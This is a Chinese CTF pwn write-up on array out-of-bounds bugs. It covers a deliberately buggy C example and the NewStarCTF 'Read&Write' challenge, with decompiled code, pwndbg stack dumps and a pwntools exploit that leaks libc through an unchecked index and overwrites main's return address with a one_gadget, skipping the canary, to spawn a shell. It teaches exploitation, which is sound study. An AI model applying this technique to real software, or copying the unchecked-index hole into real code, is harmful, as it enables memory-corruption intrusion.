ctf-pwn: 数组越界

1. 基本概念

数组越界(Array Out-of-Bounds)通常发生在以下两种情况下:

  • 访问数组下标小于0的位置。
  • 访问数组下标大于等于数组长度的位置。

2. 示例代码

假设有一个C语言程序:

#include <stdio.h>

/*
 * Deliberately broken demo of an array out-of-bounds read.
 *
 * The loop bound is `i <= 5`, so the final iteration reads array[5], one
 * element past the end of a 5-element array. Reading past the end is
 * undefined behaviour in C: what gets printed on that iteration depends on
 * the compiler and the stack layout (it may be whatever object happens to sit
 * right after `array`), and the optimizer is free to assume it never happens.
 * Do not "fix" this function if you are using it as the teaching example.
 */
void vulnerable_function() {
    int array[5] = {1, 2, 3, 4, 5};
    int i;

    for (i = 0; i <= 5; i++) {  // BUG (intentional): should be i < 5; i == 5 indexes past the end
        printf("%d\n", array[i]);
    }
}

/* Entry point: runs the deliberately out-of-bounds demo, then exits with status 0. */
int main(void)
{
    vulnerable_function();
    return 0;
}

在这个示例中,array数组的长度是5,合法的访问下标应该是0到4。然而,for循环的条件是 i <= 5,这意味着当 i 等于5时,array[i] 将访问到数组边界之外的内存位置。这就是一个典型的数组越界漏洞。需要注意,在 C 语言中越界访问是未定义行为:这里 array[5] 实际读到的是紧挨着数组的那块栈内存(具体内容取决于编译器和栈布局,可能恰好是旁边的某个局部变量),编译器也可能基于“不会越界”的假设做出意想不到的优化,所以输出结果不可预测、不可依赖。

3. 防御措施

  • 边界检查:确保在访问数组元素时进行严格的边界检查。
  • 使用安全函数:一些编程语言和库提供了带边界检查的接口,帮助防止数组越界。例如,C++ 的 `std::vector::at()` 会检查下标并在越界时抛出 `std::out_of_range`,而 `operator[]` 不做任何检查。
  • 工具和分析:使用静态和动态分析工具检测程序中的潜在数组越界漏洞。

练习[NewStarCTF 公开赛赛道]Read&Write

查看main

/*
 * Decompiled main() of the Read&Write challenge binary (IDA pseudo-C).
 *
 * Menu loop: choice 1 prints nums[idx] as a 32-bit unsigned value, choice 2
 * stores a 32-bit value into nums[idx], any other choice leaves the loop and
 * main returns. `idx` is an unsigned int taken straight from scanf and is
 * never compared against the array length (256), so every idx >= 256 reads or
 * writes stack memory above `nums`. With nums at rbp-0x410 and 4-byte
 * elements, nums[idx] lives at rbp-0x410 + 4*idx:
 *   idx 256..257 -> rbp-0x10  (the first 8 bytes past the array)
 *   idx 258..259 -> rbp-0x08  (v8, the stack canary)
 *   idx 260..261 -> rbp+0x00  (frame-pointer slot)
 *   idx 262..263 -> rbp+0x08  (main's return address; the debugger session
 *                              below shows __libc_start_main+243 there)
 * Because the index is chosen freely, an attacker can skip the canary and
 * overwrite the return address directly, so the stack protector never trips.
 * The only input validation is `scanf(...) < 0`, which catches EOF/read
 * errors only: a matching failure returns 0 and leaves the previous value in
 * place, and execution continues.
 */
int __fastcall main(int argc, const char **argv, const char **envp)
{
  unsigned int choice; // [rsp+4h] [rbp-41Ch] BYREF
  unsigned int idx; // [rsp+8h] [rbp-418h] BYREF -- raw scanf value, never bounded below
  unsigned int num_to_write; // [rsp+Ch] [rbp-414h] BYREF
  int nums[256]; // [rsp+10h] [rbp-410h] BYREF -- 0x400 bytes, ends at rbp-0x10
  unsigned __int64 v8; // [rsp+418h] [rbp-8h] -- stack canary; the compare on return is elided by IDA, checksec reports "Canary found"

  v8 = __readfsqword(0x28u);
  init();
  menu();
  memset(nums, 0, sizeof(nums));
  while ( 1 )
  {
    printf("> ");
    if ( (int)__isoc99_scanf("%u", &choice) < 0 )   // < 0 is EOF only; non-numeric input returns 0 and falls through
      break;
    if ( choice == 1 )
    {
      printf("Idx:");
      if ( (int)__isoc99_scanf("%u", &idx) < 0 )
        break;
      printf("The num: %u\n", (unsigned int)nums[idx]);   // OOB read: no idx < 256 check, 4 bytes at a time
    }
    else
    {
      if ( choice != 2 )
        break;   // any other choice exits the loop; main then returns through the (possibly overwritten) return address
      printf("Idx:");
      if ( (int)__isoc99_scanf("%u", &idx) < 0 )
        break;
      printf("Num:");
      if ( (int)__isoc99_scanf("%u", &num_to_write) < 0 )
        break;
      nums[idx] = num_to_write;   // OOB write: 4 bytes at rbp-0x410 + 4*idx; idx >= 256 reaches canary / saved rbp / return address
      puts("Done!");
    }
  }
  puts("Byebye!");
  return 0;
}

很明显的数组越界:idx 是 unsigned int,读和写都直接用 nums[idx],没有任何上界检查(scanf 返回值 < 0 只能拦住 EOF,匹配失败返回 0 照样往下走)。nums 位于 rbp-0x410,每个元素 4 字节,所以 idx >= 256 就越过了数组:256/257 落在 rbp-0x10,258/259 是 canary(rbp-8),260/261 是保存的 rbp,262/263 正好是 main 的返回地址(rbp+8)。下面用调试器验证一下这个偏移。

Idx:256

Breakpoint 2, 0x0000555555400a23 in main () at Read&Write.c:38
38	in Read&Write.c
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
─────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]──────────────────────
 RAX  0
 RBX  0x555555400af0 (__libc_csu_init) ◂— push r15
 RCX  0
 RDX  0
 RDI  0x555555400be2 ◂— push rsp /* 'The num: %u\n' */
 RSI  0xffffc370
 R8   0xa
 R9   0
 R10  0x7ffff7f70ac0 ◂— 0x100000000
 R11  0x7ffff7f713c0 ◂— 0x2000200020002
 R12  0x5555554007a0 (_start) ◂— xor ebp, ebp
 R13  0x7fffffffc370 ◂— 1
 R14  0
 R15  0
 RBP  0x7fffffffc280 ◂— 0
 RSP  0x7fffffffbe60 ◂— 0x1ffffbef4
 RIP  0x555555400a23 (main+225) ◂— call 0x555555400750
──────────────────────────────[ DISASM / x86-64 / set emulate on ]───────────────────────────────
 ► 0x555555400a23 <main+225>    call   printf@plt                  <printf@plt>
        format: 0x555555400be2 ◂— 'The num: %u\n'
        vararg: 0xffffc370
 
   0x555555400a28 <main+230>    jmp    main+367                    <main+367>
   0x555555400ab1 <main+367>    jmp    main+71                     <main+71>
   0x555555400989 <main+71>     lea    rdi, [rip + 0x247]     RDI => 0x555555400bd7 ◂— and byte ptr ds:[rax], al /* '> ' */
   0x555555400990 <main+78>     mov    eax, 0                 EAX => 0
   0x555555400995 <main+83>     call   printf@plt                  <printf@plt>
 
   0x55555540099a <main+88>     lea    rax, [rbp - 0x41c]
   0x5555554009a1 <main+95>     mov    rsi, rax
   0x5555554009a4 <main+98>     lea    rdi, [rip + 0x22f]     RDI => 0x555555400bda ◂— and eax, 0x64490075 /* '%u' */
   0x5555554009ab <main+105>    mov    eax, 0                 EAX => 0
   0x5555554009b0 <main+110>    call   __isoc99_scanf@plt          <__isoc99_scanf@plt>
────────────────────────────────────────────[ STACK ]────────────────────────────────────────────
00:0000│ rsp 0x7fffffffbe60 ◂— 0x1ffffbef4
01:0008-418 0x7fffffffbe68 ◂— 0x7fff00000100
02:0010-410 0x7fffffffbe70 ◂— 0
...5 skipped
──────────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────
 ► 0   0x555555400a23 main+225
   1   0x7ffff7df9083 __libc_start_main+243
─────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> stack 200
00:0000│ rsp 0x7fffffffbe60 ◂— 0x1ffffbef4
01:0008-418 0x7fffffffbe68 ◂— 0x7fff00000100
02:0010-410 0x7fffffffbe70 ◂— 0
...127 skipped
82:0410-010 0x7fffffffc270 —▸ 0x7fffffffc370 ◂— 1
83:0418-008 0x7fffffffc278 ◂— 0x8c8da80a4deecc00
84:0420│ rbp 0x7fffffffc280 ◂— 0
85:0428+008 0x7fffffffc288 —▸ 0x7ffff7df9083 (__libc_start_main+243) ◂— mov edi, eax
86:0430+010 0x7fffffffc290 —▸ 0x7ffff7ffc620 (_rtld_global_ro) ◂— 0x50fa300000000
87:0438+018 0x7fffffffc298 —▸ 0x7fffffffc378 —▸ 0x7fffffffc74a ◂— '/home/a5rz/Desktop/pwn/file/pwn'
88:0440+020 0x7fffffffc2a0 ◂— 0x100000000
89:0448+028 0x7fffffffc2a8 —▸ 0x555555400942 (main) ◂— push rbp
8a:0450+030 0x7fffffffc2b0 —▸ 0x555555400af0 (__libc_csu_init) ◂— push r15
8b:0458+038 0x7fffffffc2b8 ◂— 0xf489a56c1b84c028
8c:0460+040 0x7fffffffc2c0 —▸ 0x5555554007a0 (_start) ◂— xor ebp, ebp
8d:0468+048 0x7fffffffc2c8 —▸ 0x7fffffffc370 ◂— 1
8e:0470+050 0x7fffffffc2d0 ◂— 0
8f:0478+058 0x7fffffffc2d8 ◂— 0
90:0480+060 0x7fffffffc2e0 ◂— 0xb765a939ea4c028
91:0488+068 0x7fffffffc2e8 ◂— 0xb764ad33beac028
92:0490+070 0x7fffffffc2f0 ◂— 0
...2 skipped
95:04a8+088 0x7fffffffc308 ◂— 1
96:04b0+090 0x7fffffffc310 —▸ 0x7fffffffc378 —▸ 0x7fffffffc74a ◂— '/home/a5rz/Desktop/pwn/file/pwn'
97:04b8+098 0x7fffffffc318 —▸ 0x7fffffffc388 —▸ 0x7fffffffc76a ◂— 'LC_NAME=zh_CN.UTF-8'
98:04c0+0a0 0x7fffffffc320 —▸ 0x7ffff7ffe190 —▸ 0x555555400000 ◂— jg 0x555555400047
02:0010-410 0x7fffffffbe70 ◂— 0
...127 skipped

栈上从 0x7fffffffbe70 开始被折叠的 128 个 8 字节(“...127 skipped”)正好就是 nums 的 0x400 字节(128*8 = 256*4)。数组下标从 0 开始,所以下标 256 是数组后面的第一个 4 字节,即 rbp-0x10 处——上面 Idx:256 时 printf 的参数 0xffffc370 就是该 8 字节(0x7fffffffc370)的低 32 位;再往上 258/259 是 canary,262/263 是返回地址 __libc_start_main+243。
接下来看看保护

[*] '/home/a5rz/Desktop/pwn/file/pwn'
    Arch:       amd64-64-little
    RELRO:      Full RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        PIE enabled
    Stripped:   No
    Debuginfo:  Yes

尝试 one_gadget(ogg):先通过下标 262/263 泄漏返回地址算出 libc 基址,再把返回地址改写成 one_gadget 的地址。

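def out_add(idx, tube=None):
    """Leak the 64-bit value stored at nums[idx], nums[idx+1] via menu option 1.

    The binary only exposes 32-bit reads ("The num: %u"), so two adjacent
    indices are read and joined: nums[idx] is the low dword and nums[idx+1]
    the high dword (little-endian stack).

    Args:
        idx: array index of the low dword (262 for main's return address).
        tube: pwntools tube to talk to; defaults to the global ``io``.

    Returns:
        The reassembled 64-bit integer.
    """
    t = io if tube is None else tube
    dwords = []
    for i in (idx, idx + 1):
        t.sendlineafter(b'> ', b'1')
        t.sendlineafter(b'Idx:', str(i).encode())
        t.recvuntil(b'num:')
        val = int(t.recvuntil(b'\n').strip(), 10)
        print(hex(val))
        dwords.append(val)
    low, high = dwords
    # Join with shifts, not hex-string concatenation: a low dword below
    # 0x10000000 prints with fewer than 8 hex digits and the concatenated
    # string would be misaligned, yielding a wrong (smaller) address.
    adder = (high << 32) | low
    print(hex(adder))
    return adder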


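def write_add(idx, adder, tube=None):
    """Write a 64-bit value into nums[idx], nums[idx+1] via menu option 2.

    Mirrors out_add: the low dword goes to idx and the high dword to idx+1,
    one 32-bit write each (the binary only accepts "%u").

    Args:
        idx: array index of the low dword.
        adder: value to write; must fit in 64 bits.
        tube: pwntools tube to talk to; defaults to the global ``io``.

    Raises:
        ValueError: if adder is negative or does not fit in 64 bits.
    """
    if not 0 <= adder < (1 << 64):
        raise ValueError(f'value does not fit in 64 bits: {adder:#x}')
    t = io if tube is None else tube
    halves = (adder & 0xffffffff, adder >> 32)
    for i, dword in zip((idx, idx + 1), halves):
        t.sendlineafter(b'> ', b'2')
        t.sendlineafter(b'Idx:', str(i).encode())
        t.sendlineafter(b'Num:', str(dword).encode())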

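# Index 262 is main's return address: nums starts at rbp-0x410 and
# 262 * 4 = 0x418, i.e. rbp+0x8. The leaked value is __libc_start_main+243
# (see the pwndbg stack dump above), which pins the libc base despite ASLR.
adder = out_add(262)
libc_base = adder - (libc.sym['__libc_start_main'] + 243)
print(f'---------->{hex(libc_base)}')
# libc is mapped page-aligned; a misaligned base means the +243 offset or the
# leak index does not match this libc build, so stop before corrupting the stack.
assert libc_base & 0xfff == 0, f'bad libc base {libc_base:#x}'

# one_gadget candidates for the challenge libc. These offsets are specific to
# that exact build; regenerate them with `one_gadget libc.so.6` for any other.
ogg = [0xe3afe, 0xe3b01, 0xe3b04]
go_addr = libc_base + ogg[1]
# Overwrite the return address in place. Writing only at 262/263 leaves the
# canary at 258/259 untouched, so the stack-protector check on return passes.
write_add(262, go_addr)

# Any choice other than 1/2 breaks the menu loop; main prints "Byebye!" and
# returns into the gadget.
io.sendlineafter(b'> ', b'0')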

get shell!!! 注意四项保护(Full RELRO / Canary / NX / PIE)全开也没有拦住:任意下标读写可以跳过 canary 直接改写返回地址,泄漏出的返回地址又抵消了 libc 的地址随机化,所以整个过程没有触发任何保护。
